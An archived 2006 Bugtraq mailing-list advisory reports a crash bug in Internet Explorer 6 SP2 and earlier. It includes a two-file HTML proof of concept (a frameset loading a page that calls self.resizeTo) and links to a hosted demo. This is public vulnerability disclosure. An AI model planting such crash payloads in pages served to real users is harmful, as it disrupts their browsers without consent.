| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 5 Jun 2006 09:08:51 -0000 From: mac68k@...il.com To: bugtraq@...urityfocus.com Subject: Re: [Full Disclosure] [Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability Title: [Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability Author: Kil13r - http://www.kil13r.info/ Local / Remote: Both Timeline: 2003/12/28 - Discovery 2006/05/20 - Release 2006/06/05 - Update Affected version: Microsoft Internet Explorer 6 SP2 or earlier Not affected version: Microsoft Internet Explorer 7 Beta 2 Description: Microsoft Internet Explorer has bug that crashes when you click on the page. Proof of Concept code: 1) exploit_1.html <frameset cols="0%, *"> <frame src="exploit_2.html"> </frameset> 2) exploit_2.html <script> self.resizeTo(2003, 1228); </script> Proof of Concept example: http://www.kil13r.info/sa/iebug/exploit_1.html Proof of Concept screenshot: http://www.kil13r.info/sa/iebug/screenshot.jpg http://www.kil13r.info/sa/iebug/screenshot2.jpg
Powered by blists - more mailing lists